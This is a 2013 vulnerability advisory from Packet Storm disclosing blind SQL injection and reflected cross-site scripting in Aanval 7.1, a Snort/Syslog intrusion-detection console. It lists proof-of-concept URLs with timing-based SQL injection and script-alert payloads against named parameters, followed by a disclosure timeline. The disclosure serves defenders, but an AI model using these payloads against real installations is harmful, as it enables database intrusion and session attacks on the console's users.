Aanval 7.1 Build 70151 SQL Injection / Cross Site Scripting

2013-10-03T00:00:00
ID PACKETSTORM:123504
Type packetstorm
Reporter xistence
Modified 2013-10-03T00:00:00

Description

                                        
                                            `-----------  
Author:  
-----------  
  
xistence < xistence[at]0x90[.]nl >  
  
-------------------------  
Affected products:  
-------------------------  
  
Aanval 7.1 build 70151  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Aanval  
http://www.aanval.com/  
https://www.aanval.com/download/pickup  
  
-------------------------  
Product description:  
-------------------------  
  
Aanval is the industry's most comprehensive Snort and Syslog Intrusion  
Detection, Correlation,  
and Threat Management console on the market. Aanval supports both Snort and  
Suricata,  
as well as virtually any Syslog data source, and is designed specifically  
to scale from  
small-single sensor installations to global enterprise deployments.  
  
Aanval's primary function is to correlate data from multiple sources, bring  
together billions of events,  
and present users with a holistic view of false-positive free, network  
security situational awareness.  
  
----------  
Details:  
----------  
  
Aanval 7.1 build 70151 is prone to multiple vulnerabilities. Below are the  
details.  
  
[ 0x01 - Blind SQL Injection ]  
  
The "id" and "query" parameters are vulnerable to blind SQL injection. The  
proof of concept below does a sha1 benchmark on the value "1". This will  
take a couple of seconds to process in most situations and thus shows that  
the injection works.  
http://  
<IP>/aanval/?op=prv_myReports&id=2'%20and%20benchmark(20000000%2csha1(1))--%20  
http://  
<IP>/aanval/?op=prv_eventSearch&query=%20report:'%2bbenchmark(20000000%2csha1(1))%2b'  
  
  
[ 0x02 - Reflected XSS ]  
  
The following requests are vulnerable to "Cross Site Scripting" and will  
show a pop-up with the word "XSS".  
  
http://<IP>/aanval/?op=prv_eventSearch&dip=<script>alert('XSS')</script>  
http://<IP>/aanval/?op=prv_eventSearch&dport=%0Aalert('XSS')//  
http://<IP>/aanval/?num=<script>alert('XSS')</script>  
http://<IP>/aanval/?op=prv_eventSearch&protocol=%0Aalert('XSS')//  
http://  
<IP>/aanval/?op=prv_eventSearch&query=%20report:31337%0aalert('XSS')//  
http://<IP>/aanval/?op=prv_eventSearch&risk=%0Aalert('XSS')//  
http://<IP>/aanval/?op=prv_eventSearch&sip=<script>alert('XSS')</script>  
http://<IP>/aanval/?op=prv_eventSearch&sport=%0aalert('XSS')//  
http://<IP>/aanval/?op=prv_eventSearch&string=<script>alert('XSS')</script>  
http://  
<IP>/aanval/?op=prv_eventSearchResults&transaction="><script>alert('XSS')</script>  
  
-----------  
Solution:  
-----------  
  
No fix available, use a good WAF :)  
  
--------------  
Timeline:  
--------------  
  
2013-08-16 Provided details to Aanval support. Ticket is created.  
2013-09-19 Asked for status update.  
2013-09-26 No response yet, asked for status update again.  
2013-10-04 Still no response, public disclosure.  
`